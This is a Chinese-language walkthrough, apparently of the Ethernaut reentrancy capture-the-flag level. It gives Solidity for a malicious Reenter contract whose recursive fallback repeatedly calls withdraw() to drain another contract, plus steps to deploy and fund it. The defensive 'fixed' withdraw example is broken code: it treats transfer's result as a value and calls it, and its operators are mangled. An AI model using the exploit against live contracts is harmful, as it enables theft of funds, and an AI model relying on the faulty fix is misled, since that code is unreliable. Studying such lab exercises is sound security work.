区块链
什么是重入攻击?
重入攻击发生在单线程计算环境中,当执行堆栈跳转或调用子例程时,在返回到原始执行之前。
一方面,这种单线程执行确保了智能合约的原子性,并消除了一些竞争条件。另一方面,合约容易受到执行顺序不佳的影响。
在上面的示例中,合同B是恶意合同,递归地调用A.withdraw()来耗尽合同A的资金。请注意,基金提取在合同A从其递归循环返回之前成功完成,甚至意识到B已经提取出超过其自身余额的方式。
此Ethernaut级别利用此重入问题以及导致DAO黑客攻击的以下其他因素:
· 任何人都可以调用Fallback函数并执行恶意代码
· 恶意外部合同可能会滥用提款权
1、创建一个名为Reenter.sol的恶意合同,该合同将首先捐赠给Reentrance.sol,然后递归地从中退出,直到Reentrance耗尽资金。
contract Reenter {
Reentrance public original = Reentrance(YOUR_INSTANCE_ADDR);
uint public amount = 1 ether; //withdrawal amount each time
}
2、Reenter.sol和以太合约结构相同
constructor() public payable {
}
3、创建公共函数,以便reenter.sol可以向reentrance.sol捐款,并在其余额分类账中注册为捐赠者:
function donateToSelf() public {
original.donate.value(amount).gas(4000000)(address(this));//need to add value to this fn
}
4、调用此函数将确保您的恶意合同至少可以调用withdraw()一次,即通过if(balances [msg.sender]》 = _amount)检查。
上图说明了Reenter.sol从Reentrance.sol中提取所有资金的递归循环。
让我们在合同B中实现恶意回退功能,这样当合同A执行msg.sender.call.value(_amount)()退还合同B时,您的恶意合同会触发更多的撤销。
5、实现此恶意回退函数:
function() public payable {
if (address(original).balance != 0 ) {
original.withdraw(amount);
}
}
最后,在Remix中:将您的合同部署到Ropsten,为其植入以太,捐赠给Reentrance,然后调用Fallback函数,从Reentrance中耗尽所有资金。
关键要点:
· 执行顺序在Solidity中非常重要。如果你必须进行外部函数调用,那就做你做的最后一件事(在所有必要的检查和余额之后):
function withdraw(uint _amount) public {
if(balances[msg.sender] 》= _amount) {
balances[msg.sender] -= _amount;
if(msg.sender.transfer(_amount)()) {
_amount;
}
}
}
// Or even better, invoke transfer in a separate function
· 包括一个互斥锁以防止重入,例如 使用布尔锁变量来指示执行深度。
· 使用函数修饰符检查不变量时要小心:修饰符在函数开头执行。 如果变量状态将在整个函数期间发生变化,请考虑将修改器提取到放置在函数中正确行的检查中。
· “使用转移将资金从合同中转出,因为它会抛出并限制gas转发。 调用和发送等低级函数只返回false,但是当接收合同失败时不会中断执行流程。“
全部0条评论
快来发表一下你的评论吧 !